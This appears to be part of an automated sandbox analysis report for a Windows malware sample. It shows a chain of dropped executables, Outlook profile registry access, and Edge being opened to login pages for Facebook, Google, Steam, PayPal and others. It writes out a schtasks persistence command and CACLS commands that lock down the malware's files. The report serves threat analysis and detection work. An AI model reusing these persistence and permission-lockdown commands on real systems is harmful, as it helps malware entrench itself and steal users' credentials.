PID 3356 wrote to memory of 2692 N/A N/A C:\Users\Admin\AppData\Local\Temp\16FE.exe
PID 3356 wrote to memory of 1828 N/A N/A C:\Users\Admin\AppData\Local\Temp\1837.exe
PID 3356 wrote to memory of 1828 N/A N/A C:\Users\Admin\AppData\Local\Temp\1837.exe
PID 3356 wrote to memory of 1828 N/A N/A C:\Users\Admin\AppData\Local\Temp\1837.exe
PID 2692 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\16FE.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 2692 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\16FE.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 2692 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\16FE.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
PID 3356 wrote to memory of 3916 N/A N/A C:\Windows\system32\cmd.exe
PID 3356 wrote to memory of 3916 N/A N/A C:\Windows\system32\cmd.exe
PID 2216 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2216 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 2216 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
PID 4588 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 4588 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 4588 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
PID 3916 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3916 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3356 wrote to memory of 2204 N/A N/A C:\Users\Admin\AppData\Local\Temp\1B08.exe
PID 3356 wrote to memory of 2204 N/A N/A C:\Users\Admin\AppData\Local\Temp\1B08.exe
PID 3356 wrote to memory of 2204 N/A N/A C:\Users\Admin\AppData\Local\Temp\1B08.exe
PID 1564 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe
PID 1564 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe
PID 1564 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe
PID 2424 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe
PID 2424 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe
PID 2424 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe
PID 3356 wrote to memory of 4164 N/A N/A C:\Users\Admin\AppData\Local\Temp\1BD4.exe
PID 3356 wrote to memory of 4164 N/A N/A C:\Users\Admin\AppData\Local\Temp\1BD4.exe
PID 3356 wrote to memory of 4164 N/A N/A C:\Users\Admin\AppData\Local\Temp\1BD4.exe
PID 4428 wrote to memory of 744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4428 wrote to memory of 744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3356 wrote to memory of 568 N/A N/A C:\Users\Admin\AppData\Local\Temp\1CDF.exe
PID 3356 wrote to memory of 568 N/A N/A C:\Users\Admin\AppData\Local\Temp\1CDF.exe
PID 3356 wrote to memory of 568 N/A N/A C:\Users\Admin\AppData\Local\Temp\1CDF.exe
PID 3356 wrote to memory of 548 N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3356 wrote to memory of 548 N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3356 wrote to memory of 548 N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 568 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\1CDF.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 568 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\1CDF.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 568 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\1CDF.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2256 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2424 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yh035IN.exe
PID 2424 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yh035IN.exe
PID 2424 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yh035IN.exe
PID 3916 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3916 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4728 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4728 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 4728 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 1556 wrote to memory of 2528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1556 wrote to memory of 2528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4728 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 4728 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\6D08.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe

"C:\Users\Admin\AppData\Local\Temp\0x0006000000022e0b-53.exe"

C:\Users\Admin\AppData\Local\Temp\16FE.exe

C:\Users\Admin\AppData\Local\Temp\16FE.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe

C:\Users\Admin\AppData\Local\Temp\1837.exe

C:\Users\Admin\AppData\Local\Temp\1837.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1990.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\1B08.exe

C:\Users\Admin\AppData\Local\Temp\1B08.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HG0CX5rO.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1XI48lH3.exe

C:\Users\Admin\AppData\Local\Temp\1BD4.exe

C:\Users\Admin\AppData\Local\Temp\1BD4.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Users\Admin\AppData\Local\Temp\1CDF.exe

C:\Users\Admin\AppData\Local\Temp\1CDF.exe

C:\Users\Admin\AppData\Local\Temp\1F70.exe

C:\Users\Admin\AppData\Local\Temp\1F70.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2304 -ip 2304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yh035IN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yh035IN.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 548 -ip 548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 784

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\4132.exe

C:\Users\Admin\AppData\Local\Temp\4132.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff956be46f8,0x7ff956be4708,0x7ff956be4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6604 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\446F.exe

C:\Users\Admin\AppData\Local\Temp\446F.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\5D37.exe

C:\Users\Admin\AppData\Local\Temp\5D37.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

